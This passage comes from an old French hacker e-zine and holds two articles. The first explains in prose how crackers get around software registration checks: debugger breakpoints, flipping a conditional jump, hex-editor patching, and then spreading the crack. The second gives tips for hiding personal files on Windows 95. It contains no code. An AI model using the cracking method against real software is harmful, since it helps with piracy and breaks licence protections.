multitache.. vous avez toutes les chances de tomber dans un recoin de win95...
Donc, le cracker, si il veux tomber sur l'endroit de son programme a 2 methodes: soit
il recherche dans la liste de procecus l'adresse hexa de son programme, et y pose
un breakpoint (en kelkes sorte on gelle le prog et on se retrouve sur softice a l'endroit
désiré), ou alors il pose directement un breakpoint sur une instruction bien precise...
l'instruction peut etre une instruction qui se charge de recuperer du texte dans une boite
de dialogue, bien utile pour les boites de dialogue: registration par exemple :).
Bon bref une fois que vous avez reussi a vous arreter juste avant l'endroit qui vous pose
probleme, il ne vous reste plus qu'a "
suivre" le programme et analyser le code assembleur
pour savoir ou se trame la chose.. Au depart on commences souvent a chercher ou est passé son nom
et son pass.... En general vous aurez un jz ou un jnz a changer par un jmp mais le plus dur
c'est de trouver lequel est le bon :) Bon si le cracker arrive a trouver l'endroit ki bloque,
il a juste a remplacer l'ancienne instruction par la nouvelle... là hop tout est en memoire
le cracker relance le programme et hop si ca marche c'est bon! a noter la modification faite
par le debugger n'est pas definitive, ele sert juste a voir si son truc marche. Le cracker
aura pris le soin auparavant de noter l'adresse hexadecimal de l'instruction, ou alors, noter
5-6 octets qui entourent cette instruction... là il lance son editeur hexadecimal, il ouvre
son programme avec, et fais un rechercher avec ses 5-6 octets dans le fichier (si il n'en
prenait k'un seul il serait emmerdé puisque le programme peut contenir des milliers de fois
ce meme octet), ou alors il se rend directement a l'adresse hexa de l'instruction.. il ne lui
reste plus k'a la changer, enregistrer son oeuvre et relancer son prog convoité... là
oh miracle!!! Son crack marche comme par magie, le cracker va s'empresser de le distribuer
partout sur le net! Mais le meilleur du meilleur pour un cracker c'est de faire un programme
qui se chargeras lui meme de faire les modifications du programme cracké, ou alors donner
le mot de passe correspondant a un nom.. On apelle ca un crack et j'imagine ke vous
en avez dejà pleins ;) Bien sur la maitrise de l'assembleur est un atout de taille
pour un cracker, aussi bien pour cracker, que pour faire le crack ;).
Cet article n'etais pas un cours, mais juste un moyen de faire comprendre a certains
comment ca marche.. si vous voulez un cours (je vais pas refaire des choses bien faites),
vous n'avez juste k'a telecharger le mag mj13 #1 et #2 ou alors d'autres tutorials comme
celui d'ed!son ke vous pouvez trouver un peu partout sur le net.

kl@imer



-------------------------==×××:~#


12. -> Planquer ses fichiers

Bon non peut dire que j'ai serieusement étudié la chose avec windows95... les images de cul et
autres fichiers compromettants, je les planques, et pour cela plusieurs solutions.
Première solution, planquer vos fichiers dans un coin ou personne ne vas... evidemment
plus y'a de fichiers dans ce dossier plus votre fichier passe inapercu. Au préalable, il faut
changer le nom de son fichier histoire de pas avoir l'air con avec un fichier ass.jpg
ou pussy.gif ;) bon, alors dans les endroits ou les fichiers passe particulierement bien,
sont: windows\ , windows\system\ ... voilà pour les meilleurs. Autre solution, les foutres en
fichier cachés, mais c'est trop facilement reperable. Un autre truc serait de
creer une sorte de labyrinthe de repertoires... on crée une tonne de repertoires, et a chaque
repertoire on en rajoute encore une tonne, et ainsi de suite, et pour finir on fou son fichier
dans un des repertoires, le plus haut dans l'arborescence possible.. Faut pas non plus y aller
trop fort avec le nombre de couches de dossier (ne dépassez pas 3) paske certain utilitaires
detecteraient une anomalie. et puis fo pas oublier de retenir le bon chemin pour vous y
retrouver apres. le meilleur c'est de foutre aussi son fichier caché, et ajouter en plus de
ca des fichiers dll dans les autres repertoires... croyez moi le gars va laisser tomber si il
cherche votre fichier...

THE schema pour ceux k'auraient pas captés:
legende:
Dx : dossier
F : fichier a planquer, qu'on aura donné l'attribut caché
Ca : Un fichier caché quelcquonque, des dlls par exemple


|_D2-|_Ca
3dsmax |_D3 ... |_D9
klaimer |_D4 |_D10 |_Ca
Program files | |_D11--------|_F
C:\ D1 ---------------D5 | |_Ca
windows |_D6--------D12
|_D7 |_D13
|_D8 |_D14---|_Ca
... ... |_Ca
...

Bon bref vous pouvez vous amuser a faire des trucs vachement bordeliques tout en sachant
que votre fichier est ici dans: c:\D1\D6\D11\
Bon, cette methode je la trouve limite, et j'ai gardé le meilleur pour la fin: changer
l'extension de son fichier. Exemple: t'as une image qui s'apelle truc.jpg: hop
tu change son extension en dll et là si le gars reussi a te trouver ton image, chapeau...
par contre, toi a chaque fois que tu voudras la voir, faudras que t'affiche tout les fichiers
cachés et renommer ton ficher en truc.jpg, et kan t'auras finit faudras le renommer en dll..
c'est chiant mais avec ca pas de risques. AUtre chose, si vous en avez des dizaines
a cacher, pas la peine de vous emmerder a toutes les renommer a chaque fois que vous voulez les
lire, j'ai une methode bien meilleur: vous faites un fichier zip dans lequel vous y foutez tous
vos fichiers, et c'est seulement ce fichier zip que vous aurez a renommer en dll :) elle est
pas belle la vie? :)
Bien sur vous pouvez tout combiner, mais bon apres ce qui est chiant, c'est que ca deviens meme
compliqué pour soi-meme de retrouver son fichier :)))

kl@imer


-------------------------==×××:~#


THE END ("
ouin!!!" enfin on dit ca pour vous paske nous on est heureux ;)

writed by kl@imer, °patriX°, °-_-° bOmb_z °-_-°

DISTRIBUTE THIS MAG!!!!!!!!!!!!

<!{Greets}!>
DaKe, Flash, ToNy, JoG-, Omy, Omer_1, elise, ludo-...

<!{BlasT Nation On Line}!>

WWW\> http://www.mygale.org/~bnation
Email\> blastnation@hotmail.com
IRC\> IRCNET: #blastnation (vous affolez pas si on y est pas)

(c)BlasT Nation (copyright, hehe ;)
<!{EOF}!>


← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT